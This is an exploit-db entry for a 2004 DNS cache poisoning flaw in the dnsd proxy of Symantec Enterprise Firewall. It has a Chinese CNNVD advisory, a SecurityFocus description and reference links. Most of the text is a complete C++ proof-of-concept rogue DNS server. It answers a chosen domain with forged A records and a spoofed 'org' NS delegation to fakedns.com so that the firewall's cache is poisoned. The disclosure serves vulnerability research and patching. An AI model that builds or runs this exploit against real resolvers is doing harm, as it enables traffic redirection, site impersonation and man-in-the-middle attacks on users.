https://www.exploit-db.com/exploits/24218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200406-050

SymantecEnterpriseFirewall是一款企业级防火墙，包含DNSD代理。Symantec企业级防火墙的DNSD实现存在问题，远程攻击者可以利用这个漏洞进行中间人，伪造站点或其他各种攻击。主要问题是Dnsd代理没有进行正确检查，确保从远程DNS服务器返回的数据包含请求记录相关的数据，攻击者可以控制DNS服务器，返回恶意应答，而导致在目标系统中插入伪造的DNS条目，从而攻击者可以进行类似中间人攻击/拒绝服务/社会工程等攻击。

source: http://www.securityfocus.com/bid/10557/info

It is reported that dnsd is prone to a cache poisoning vulnerability.

Dnsd does not ensure that the data returned from a remote DNS server contains related information about the requested records.

An attacker could exploit this vulnerability to deny service to legitimate users by redirecting traffic to inappropriate hosts. Man-in-the-middle attacks, impersonation of sites, and other attacks may be possible.

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
 // close down the server system
 pos_setquitflag();
}

int main(int argc, char **argv) {
_addr a;

 try {
   /* get command-line arguments */
   if (argc != 2 ) {
     printf( "Usage: %s [domainname]n", argv[0] );
     return 1;
   } else {
     dyndomain = argv[1];
     txt_to_addr(&a, "any");
   }

   poslib_config_init();

   /* bring up posadis */
   servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

   // use the posadis logging system
   pos_log(context_none, log_info, "Proof of concept DNS server starting up...");

   // set signal handlers
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);

   // set query function
   handle_query = my_handle_query;

   // run server
   posserver_run();
 } catch (PException p) {
   printf("Fatal exception: %sn", p.message);
   return 1;
 }

 return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
 DnsMessage *a = new DnsMessage();
 DnsQuestion q;
 DnsRR rr;

 /* set a as an answer to the query */
 a->ID = query->message->ID;
 a->RD = query->message->RD;
 a->RA = false;

 if (query->message->questions.begin() == query->message->questions.end()) {
   /* query did not contain question */
   a->RCODE = RCODE_QUERYERR;
   return a;
 }
 q = *query->message->questions.begin();
 a->questions.push_back(q);
 a->QR = true;

 pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(), str_qtype(q.QTYPE).c_str());

 if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
   rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
   string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything...
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->answers.push_back(rr);

   rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
   data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->authority.push_back(rr);

   rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
   data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->additional.push_back(rr);
 } else {
   /* we don't want this */
   a->RCODE = RCODE_SRVFAIL;
 }
 return a;
}
#########################################################
# End poc.cpp
#########################################################

来源:BID
名称:10557
链接:http://www.securityfocus.com/bid/10557
来源:securityresponse.symantec.com
链接:http://securityresponse.symantec.com/avcenter/security/Content/2004.06.21.html
来源:SECUNIA
名称:11888
链接:http://secunia.com/advisories/11888
来源:BUGTRAQ
名称:20040615SymantecEnterpriseFirewallDNSDcachepoisoningVulnerability
链接:http://lists.virus.org/bugtraq-0406/msg00234.html